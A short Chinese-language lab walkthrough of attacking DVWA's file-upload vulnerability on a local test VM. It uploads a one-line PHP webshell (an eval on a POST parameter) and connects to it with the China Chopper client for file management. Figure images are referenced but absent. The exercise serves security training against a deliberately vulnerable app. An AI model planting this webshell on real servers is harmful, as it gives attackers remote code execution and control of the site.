菜刀实施文件上传漏洞攻击:
4.1 问题
- DVWA搭建在Win2008虚拟机(192.168.111.142)
- 在宿主机访问DVWA,DVWA级别设置Low
- 利用文件上传漏洞,使用一句话木马和菜刀攻击
4.2 步骤
实现此案例需要按照如下步骤进行。
1)访问DVWA,选择Low级别,然后点击“File Upload”,如图-37所示
图-37
2)使用一句话木马<?php @eval($_POST['config']); ?>,将一句话保存到phpxm.php中上传,如图-38所示
图-38
3)运行菜刀后,右键点击出菜单,添加,如图-39所示
图-39
4)配置路径http://192.168.111.142/dvwa-master/hackable/uploads/phpxm.php,配置连接字串“config”,点击“添加”,如图-40所示
图-40
5)右键点击出菜单,如图-41所示
图-41
6)可以进行文件管理了,如图-42所示
图-42